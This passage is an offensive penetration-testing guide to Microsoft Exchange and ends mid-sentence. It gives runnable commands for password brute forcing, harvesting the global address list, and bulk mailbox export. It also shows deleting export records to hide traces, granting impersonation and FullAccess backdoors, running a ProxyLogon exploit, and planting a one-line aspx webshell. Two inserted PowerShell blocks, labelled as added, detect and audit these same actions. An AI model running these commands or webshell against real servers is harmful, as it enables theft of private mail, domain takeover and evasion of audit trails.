
Title: Exchange Mail Service Penetration Tips


During a penetration test, the Exchange mail server is usually a primary target. Once the Exchange server has been taken down, the permissions of its machine account can be used to grant another domain user DCSync rights; the hashes of the whole domain can then be exported and the entire domain taken over.

Exchange is configured from PowerShell; the cmdlet reference (for example Add-MailboxFolderPermission) is at https://learn.microsoft.com/zh-cn/powershell/module/exchange/add-mailboxfolderpermission?view=exchange-ps

Scan Service

setspn.exe

setspn.exe -T vvvv1.com -F -Q */* | findstr exchange


nmap

nmap 192.168.52.139 -A


Probe Versions and Vulnerabilities

Obtain the precise Exchange version through the EWS interface


Drawback: some older Exchange versions do not support this.

Obtain the approximate Exchange version through the OWA interface


After obtaining the version number, you can go to the official website to check the corresponding Exchange version and release date.

Query address:

https://learn.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2016

Use scripts to detect versions and vulnerabilities

https://github.com/3gstudent/Homework-of-Python/blob/master/Exchange_GetVersion_MatchVul.py


Brute forcing

python2 EBurst.py -d 192.168.52.139 -C

The same tool can also be used to brute-force user account passwords.

python2 EBurst.py -d 192.168.52.139 -L ./users.txt -P ./passwords.txt --ews

Information Collection

Assuming that the credentials of one of the email users have been obtained, information can be collected next.

Information collection through Autodiscover

The https://Exchange/autodiscover/autodiscover.xml interface accepts an XML request and returns the mailbox configuration for the email address specified in the XML.

Because NTLMv2 authentication requires an HTTP/1.1 connection, and recent versions of Burp Suite default to HTTP/2, this must be adjusted first.

https://blog.csdn.net/qq_30786785/article/details/121742101

For operations such as reading the configuration, refer to the following link.

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Exchange-Autodiscover%E7%9A%84%E4%BD%BF%E7%94%A8

Basic authentication is used here; the Authorization header carries the credential VVVV1\administrator:admin!@#456 base64-encoded (encoded, not encrypted).

POST /autodiscover/autodiscover.xml HTTP/1.1
Host: 192.168.52.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Authorization: Basic VlZWVjFcYWRtaW5pc3RyYXRvcjphZG1pbiFAIzQ1Ng==
Content-Type: text/xml
Content-Length: 350

<Autodiscover xmlns='http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006'>
  <Request>
    <EMailAddress>[email protected]</EMailAddress>
    <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
  </Request>
</Autodiscover>

If the mailbox does not exist, an error response is returned.

If the mailbox exists, its configuration information is returned.
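As an added defender-side example (not code from the original post), the following PowerShell flags the two behaviours described above, EWS password brute forcing and Autodiscover mailbox enumeration, in the Exchange front end's IIS W3C logs; the log lines are constructed samples and the thresholds are assumptions to tune per environment.

```powershell
# Constructed IIS W3C sample (not from the original post). Real logs live under
# C:\inetpub\logs\LogFiles\W3SVC1\ by default; the field list matches a typical Exchange front end.
$SampleLog = @'
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-01-10 09:00:01 192.168.52.139 POST /ews/exchange.asmx - 443 - 10.0.0.7 python-requests/2.31 401 1 1326 12
2024-01-10 09:00:01 192.168.52.139 POST /ews/exchange.asmx - 443 - 10.0.0.7 python-requests/2.31 401 1 1326 11
2024-01-10 09:00:02 192.168.52.139 POST /ews/exchange.asmx - 443 - 10.0.0.7 python-requests/2.31 401 1 1326 10
2024-01-10 09:00:03 192.168.52.139 POST /ews/exchange.asmx - 443 VVVV1\administrator 10.0.0.7 python-requests/2.31 200 0 0 35
2024-01-10 09:00:10 192.168.52.139 POST /autodiscover/autodiscover.xml - 443 VVVV1\administrator 10.0.0.7 Mozilla/5.0 200 0 0 40
2024-01-10 09:00:10 192.168.52.139 POST /autodiscover/autodiscover.xml - 443 VVVV1\administrator 10.0.0.7 Mozilla/5.0 200 0 0 39
2024-01-10 09:00:11 192.168.52.139 POST /autodiscover/autodiscover.xml - 443 VVVV1\administrator 10.0.0.7 Mozilla/5.0 200 0 0 41
2024-01-10 09:01:00 192.168.52.139 POST /autodiscover/autodiscover.xml - 443 - 10.0.0.20 Microsoft+Office/16.0 401 2 5 5
2024-01-10 09:01:00 192.168.52.139 POST /autodiscover/autodiscover.xml - 443 VVVV1\alice 10.0.0.20 Microsoft+Office/16.0 200 0 0 44
'@

# Turn W3C lines into objects keyed by the names in the #Fields directive.
function ConvertFrom-IisW3cLog {
    param([string[]]$Lines)
    $fields = @()
    foreach ($line in $Lines) {
        if ($line -like '#Fields:*') { $fields = ($line -replace '^#Fields:\s*', '') -split ' '; continue }
        if ($line -match '^\s*(#|$)') { continue }            # other directives and blank lines
        $values = $line -split ' '
        $rec = [ordered]@{}
        for ($i = 0; $i -lt $fields.Count; $i++) { $rec[$fields[$i]] = $values[$i] }
        [pscustomobject]$rec
    }
}

function Find-ExchangeAuthAbuse {
    param([string[]]$Lines, [int]$FailureThreshold = 3, [int]$AutodiscoverThreshold = 3)  # thresholds: assumptions
    ConvertFrom-IisW3cLog -Lines $Lines | Group-Object 'c-ip' | ForEach-Object {
        $ip = $_.Name
        # 401 with win32-status 1326 (ERROR_LOGON_FAILURE) is a rejected credential; the 401s of a
        # normal NTLM/Basic challenge carry other codes (e.g. 401.2 / 5) and are not counted.
        $failed = @($_.Group | Where-Object { $_.'sc-status' -eq '401' -and $_.'sc-win32-status' -eq '1326' -and
                                               $_.'cs-uri-stem' -match '^/(ews|owa|autodiscover|mapi|rpc)/' })
        $autod = @($_.Group | Where-Object { $_.'cs-method' -eq 'POST' -and $_.'cs-uri-stem' -eq '/autodiscover/autodiscover.xml' })
        if ($failed.Count -ge $FailureThreshold) {
            [pscustomobject]@{ ClientIP = $ip; Count = $failed.Count; Finding = 'repeated failed logons on Exchange auth endpoints (password guessing)' }
        }
        if ($autod.Count -ge $AutodiscoverThreshold) {
            [pscustomobject]@{ ClientIP = $ip; Count = $autod.Count; Finding = 'burst of Autodiscover POSTs from one client (mailbox enumeration)' }
        }
    }
}

Find-ExchangeAuthAbuse -Lines ($SampleLog -split "`r?`n") | Format-Table -AutoSize
# Real logs: Find-ExchangeAuthAbuse -Lines (Get-Content 'C:\inetpub\logs\LogFiles\W3SVC1\u_ex240110.log')
```

On the sample, only 10.0.0.7 is reported (three failed EWS logons, then three Autodiscover POSTs once a password worked); the Outlook client at 10.0.0.20 produces the usual single challenge-then-success pair and stays quiet.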

Get exchange address book

The Global Address List (GAL) contains the email addresses of all email users in the Exchange organization. As long as you obtain the credentials of any email user in the Exchange organization, you can export the email addresses of other email users. You can use OWA, EWS, OAB, RPC over HTTP, MAPI over HTTP, etc. to obtain GAL.

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E8%8E%B7%E5%BE%97Exchange-GlobalAddressList%E7%9A%84%E6%96%B9%E6%B3%95

https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/

Use OWA to view directly

People > All users

Get GAL through /EWS interface

Powershell -ExecutionPolicy Bypass

Import-Module .\MailSniper.ps1

Get-GlobalAddressList -ExchHostname 192.168.52.139 -UserName VVVV1\administrator -Password admin!@#456 -OutFile gal.txt


Get GAL through OAB

1. Collect the OAB path through Autodiscover;

2. Access /OAB/OABURI/oab.xml;

3. In oab.xml, find the LZX file address that corresponds to the default Global Address List, and access /OAB/OABURI/LZXURI to obtain the LZX file;

4. Use the cabextract tool to decompress the LZX file and recover the GAL;

https://www.cabextract.org.uk/

Export GAL and information collection through RPC (MAPI) over HTTP

MAPI over HTTP is the default communication protocol between Outlook and Exchange 2016.

MAPI over HTTP is a new transport protocol introduced in Exchange Server 2013 Service Pack 1 (SP1) to replace RPC over HTTP (also known as Outlook Anywhere).

MAPI over HTTP is not enabled by default in Exchange 2013, where Outlook and Exchange communicate over RPC over HTTP.

Use the impacket exchanger module to list the address tables and find the GUID of the one you need

python exchanger.py VVVV1/admins:User!@#[email protected] list-tables


Export all users

python exchanger.py VVVV1/admins:User!@#[email protected] dump-tables -guid 784f58c1-8bd1-4d28-81fa-52d22ce95738


Remote export of the GAL through Python

python ewsManage_Downloader.py 192.168.52.139 443 plaintext vvvv1.com admins User!@#45 findallpeople


Export email content

Download emails directly through the /OWA interface

Log in with the account password, then read or download the emails directly in the page.

Export email content through /EWS interface

Remote export of emails through Python

Export works with either a plaintext password or an NTLM hash.

python ewsManage_Downloader.py 192.168.52.139 443 plaintext vvvv1.com administrator admin!@#456 download

python ewsManage_Downloader.py test.com 80 ntlmhash NULL user1 c5a237b7e9d8e708d8436b6148a25fa1 findallpeople

Python-based export generally works by sending SOAP XML messages to EWS.

Official XML elements documentation:

https://learn.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-xml-elements-in-exchange

Export emails through exshell.ps1

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8EExchange%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E6%90%9C%E7%B4%A2%E5%92%8C%E5%AF%BC%E5%87%BA%E9%82%AE%E4%BB%B6

Powershell.exe -psconsolefile "C:\Program Files\Microsoft\Exchange Server\V15\Bin\exshell.psc1" -command "New-MailboxExportRequest -Mailbox administrator -FilePath '\\localhost\c$\exchange1.pst'"

Of course, after the mailbox has been exported, the traces of the export request also need to be cleared.

View email export request history

Powershell.exe -psconsolefile "C:\Program Files\Microsoft\Exchange Server\V15\Bin\exshell.psc1" -command "Get-MailboxExportRequest"

Delete export request records

Powershell.exe -psconsolefile "C:\Program Files\Microsoft\Exchange Server\V15\Bin\exshell.psc1" -command "Remove-MailboxExportRequest"

The Identity parameter is the Mailbox value from the Get-MailboxExportRequest output above.

Powershell.exe -psconsolefile "C:\Program Files\Microsoft\Exchange Server\V15\Bin\exshell.psc1" -command "Remove-MailboxExportRequest -Identity 'vvvv1.com/Users/Administrator\MailboxExport' -Confirm:$false"

Mailbox takeover and backdoor planting

Configure impersonation permissions

https://4sysops.com/archives/exchange-impersonation-grant-permissions-to-service-accounts/

Just add the following permission.

Verify that the impersonation permission is present:

https://192.168.52.139/ecp/[email protected]/

Actual use requires combining this with script files.

View members with impersonation permission

Get-ManagementRoleAssignment -Role:ApplicationImpersonation

Powershell.exe -psconsolefile "C:\Program Files\Microsoft\Exchange Server\V15\Bin\exshell.psc1" -command "Get-ManagementRoleAssignment -Role:ApplicationImpersonation"

Create a new member with impersonation permission

New-ManagementRoleAssignment -Role:ApplicationImpersonation -User:[email protected]

Remove the newly added impersonation permission member

Remove-ManagementRoleAssignment 'ApplicationImpersonation-admins'

Configure FullAccess permissions

https://blog.csdn.net/weixin_34123613/article/details/90079532

Get-Mailbox -ResultSize unlimited -Filter {(RecipientTypeDetails -eq 'UserMailbox') -and (Alias -ne 'Administrator')} | Add-MailboxPermission -User administrator -AccessRights fullaccess -InheritanceType all

Cancel FullAccess permission

Get-Mailbox -ResultSize unlimited -Filter {(RecipientTypeDetails -eq 'UserMailbox') -and (Alias -ne 'Administrator')} | remove-MailboxPermission -User administrator -AccessRights fullaccess -InheritanceType all

Verify FullAccess permissions
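As an added defender-side example (not code from the original post), the following PowerShell audits the traces left by the mailbox export, ApplicationImpersonation and FullAccess steps above from the Exchange Management Shell (or via the exshell.psc1 console file as in the commands above); property names are the cmdlets' real output properties, while the lookback window is an assumption.

```powershell
# 1. ApplicationImpersonation assigned directly to a user, as New-ManagementRoleAssignment
#    -User does above. Normal deployments assign this role to role groups, not to users.
function Get-DirectImpersonationAssignments {
    Get-ManagementRoleAssignment -Role ApplicationImpersonation |
        Where-Object { $_.RoleAssigneeType -eq 'User' } |
        Select-Object Name, RoleAssignee, WhenCreated
}

# 2. Explicit (non-inherited) FullAccess for someone other than the mailbox owner, which is
#    what the Add-MailboxPermission one-liner above creates on every user mailbox.
function Get-NonOwnerFullAccess {
    Get-Mailbox -ResultSize Unlimited -Filter { RecipientTypeDetails -eq 'UserMailbox' } |
        Get-MailboxPermission |
        Where-Object {
            $_.AccessRights -contains 'FullAccess' -and -not $_.IsInherited -and -not $_.Deny -and
            "$($_.User)" -ne 'NT AUTHORITY\SELF' -and "$($_.User)" -notlike 'S-1-5-*'
        } |
        Select-Object Identity, User, AccessRights
}

# 3. Mailbox exports. Remove-MailboxExportRequest deletes the request object, but the admin
#    audit log (enabled by default, 90-day retention) still records the New-/Remove- cmdlet
#    runs, including the -FilePath the export was written to.
function Get-MailboxExportHistory {
    param([int]$Days = 30)   # lookback window (assumption)
    $audit = Search-AdminAuditLog -StartDate (Get-Date).AddDays(-$Days) -EndDate (Get-Date) -Cmdlets 'New-MailboxExportRequest','Remove-MailboxExportRequest' |
        Select-Object RunDate, Caller, CmdletName,
            @{ n = 'Parameters'; e = { ($_.CmdletParameters | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join ' ' } }
    [pscustomobject]@{
        AdminAuditLogEnabled = (Get-AdminAuditLogConfig).AdminAuditLogEnabled
        ActiveRequests       = @(Get-MailboxExportRequest | Select-Object Name, Mailbox, Status)
        AuditedCmdlets       = @($audit)
    }
}

Get-DirectImpersonationAssignments | Format-Table -AutoSize
Get-NonOwnerFullAccess | Format-Table -AutoSize
(Get-MailboxExportHistory -Days 30).AuditedCmdlets | Format-Table -AutoSize
```

If AdminAuditLogEnabled comes back False, the third check can only see requests that still exist, so treat that setting itself as a finding.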

Vulnerability exploitation

python ProxyLogon.py --host=exchange.com [email protected]

aspx Trojan: script language='JScript' runat='server' function Page_Load(){/**/eval(Request['command'],'unsafe');}/script

Post-exploitation stage

Exchange server information collection

Get the default installation path of exchange

echo %ExchangeInstallPath%

Relative to that path, the console file is at %ExchangeInstallPath%\Bin\exshell.psc1

List all mailboxes

powershell.exe -psconsolefile 'C:\Program Files\Microsoft\Exchange Server\V15\bin\exshell.psc1' -command 'get-mailbox -resultsize unlimited'


Analyze email tracking log

The email tracking log is located in %Excha
